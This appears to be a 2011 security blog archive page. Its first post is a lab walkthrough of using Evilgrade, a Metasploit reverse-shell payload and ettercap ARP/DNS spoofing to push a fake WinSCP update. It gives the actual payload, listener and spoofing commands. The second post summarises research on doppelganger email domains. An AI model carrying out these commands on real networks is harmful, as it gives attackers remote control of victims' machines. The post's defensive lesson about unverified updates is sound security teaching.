Archive for September, 2011


Don’t Upgrade Your Software…

Sep 29, 2011 in Security

[SecurePlanet Wiki][SecurePlanet RSS Feed][SecurePlanet RSS Vulnerabilities] 


I finally got some time to play around with Evilgrade (Download Here: Download Evilgrade. You might be asking what is Evilgrade:

“Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates.” -

What does this mean to you? Lets say your software tries to go look for an update and instead of downloading the correct update, you man-in-the-middle the connection and send them a malicious update instead.

So infobytesec created a framework to help assist in this type of attack. They state that they have at least 60+ applications that allow full exploitation via updates. Some examples are:

– Notepad++ 5.8.2
– Java 1.6.0_22winxp/win7
– aMSN 0.98.3
– Appleupdate – Mirc 7.14
– Windows update (ie6 lastversion, ie7 7.0.5730.13, ie8 8.0.60001.18702, Microsoft works)
– Dap
– Winscp 4.2.9
– AutoIt Script
– Clamwin
– AppTapp Installer 3.11 (Iphone/Itunes)
– getjar (
– Google Analytics Javascript injection
– Speedbit Optimizer 3.0 / Video Acceleration
– Winamp 5.581


How does this all work? We are going to use WinSCP as an example, which is a very common file transfer software.  My initial setup is that I have two boxes ready.  One is the host that will run the WinSCP software and the other is an attacker host which is running Backtrack 5.

First, you need to figure out where the software WinSCP looks for updates once the application is installed. I booted up Wireshark, executed WinSCP, and looked at the output. Wireshark Output:

Wireshark Output Showing the Host Name

So, from the output we see that WinSCP goes to Nothing to crazy here.

1) On Backtrack 5, I downloaded the newest Metasploit version 5 and installed ettercap.

2) Evilgrade needs a malicious payload to give the client trying to upgrade.  We are going to go to metasploit to create this reverse shell.  Go into the Agent folder in evilgrade (/pentest/exploits/isr-evilgrade/agent) and type:

Code: /opt/framework-4.0.0/msf3/msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=8081 X > super_update.exe
Image: super_update.exe Reverse Shell

This created a file called super_update.exe that when executed makes a reverse shell back to my host (

3) Now that we have our malicious payload, we need to setup a listener so that the reverse shell can connect back to you through Metasploit:

Code: /opt/framework-4.0.0/msf3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=8081 LHOST= E
Image: Reverse Shell

4) We know that our host is going to go to call to when it tries to update, so we need to make sure that it resolves to our attacker box.

Code: echo " A" >> /usr/local/share/ettercap/etter.dns

What this does is modifies the ettercap filter, so that when anyone asks for, we are going to give them our attacker IP (

5) Our next step will be to arp posion the host machine so that any DNS request is going to be sent through our attacker box. Easiest way to do this will be through ettercap:

Code: ettercap -TqM arp:remote / /
Image: Running Ettercap

Once inside ettercap, press the letter “P” and choose “dns_spoof”
Image: DNS Spoof

6) Now we are ready to run evilgrade! ./evilgrade
6a) Run: conf winscp
6b) Run: set agent /pentest/exploit/isr-evilgrade/agent/super_update.exe
6c) Run: start

Image: Running Evilgrade

7) We are all set. Now when the user executes WinSCP and it tries to update, the host will look for Luckily, our man-in-the-middle setup, redirects to our attacker box ( Even better is that evilgrade setup a webserver to host our agent (reverse shell) file. If you look closely, it updates with version 9.6.6, which is not a valid WinSCP version.

Image: WinSCP tries to Update
Image: Reverse Shell Gets Delivered
Image: Exploited Box!!!

8) And look, Exploitation complete! Full control of our host machine via updates.

Now why does this work. It’s because many of these software companies do not use cryptographic key to validate updates that only that specific vendor would use. Most applications do not try to do any validation, therefore they become an easy target for exploitation. Go sniff you application updates and make sure that they do some type of authentication/verification before downloading their update. If they don’t, go ask them to!

Doppelganger Domains

Sep 06, 2011 in Security

[SecurePlanet Wiki][SecurePlanet RSS Feed][SecurePlanet RSS Vulnerabilities]

Sorry for not being able to update in a while, but I have been spending a lot of time on the Doppelganger Domains project. Check out our final product here:

Domain typo-squatting is commonly used to spread malware to users whom accidentally misspell a legitimate domain in their web browser. A new type of domain typo-squatting takes advantage of an omission instead of a misspelling. A Doppelganger Domain is a domain spelled identical to a legitimate fully qualified domain name (FQDN) but missing the dot between host/subdomain and domain, to be used for malicious purposes. Doppelganger Domains have a potent impact via email as attackers could gather information such as trade secrets, user names and passwords, and other employee information.

Each company in the Fortune 500 was profiled for susceptibility to Doppelganger Domains and 151 companies (or 30%) were found to be susceptible. In large corporations, email usage is extremely high and the likelihood of some email being mis-sent is high which could result in data leakage.

Download and read the whitepaper for impact details, vulnerability prevalence, and mitigation strategies. We are also offering a free scan to identify if your domain is vulnerable to the doppelganger domain attack.